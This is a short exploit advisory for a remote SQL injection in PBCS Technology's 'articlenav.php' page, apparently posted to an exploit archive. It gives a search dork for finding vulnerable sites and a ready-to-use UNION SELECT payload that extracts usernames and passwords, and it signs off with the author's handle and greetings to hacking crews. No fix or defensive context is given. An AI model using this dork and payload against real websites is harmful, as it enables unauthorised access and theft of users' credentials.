######################################################################################################################### #PBCS Technology (articlenav id) Remote SQL Injection Exploit # #=======================================================================================================================# # # #Critical Level : Dangerous # # # #Venedor site : http://www.pbcstechnology.com/ # # # # # # # #=======================================================================================================================# # # #DORK : "Powered by PBCS Technology" # # # #Note : JScript must be activated to see the error ! # # # # # #Exploit : # #-------------------------------- # # # #www.[URL]/[PATH]/articlenav.php?id=-1+union+all+select+1,2,3,4,concat(username,0x3a,upassword),6,7+from+passwords-- # # # #=======================================================================================================================# #Discovered by : -tmh- # # # #Contact : tmh[at]sys-flaw.com # # # #Greetz to : n00bor , Five-Three-Nine , J0hn.X3r , electron1x , meckl , Floo , -Patrick_B , abcdef , # # Loader007 , bizzit , Sys-Flaw , Codesoft , Free-Hack # # # #########################################################################################################################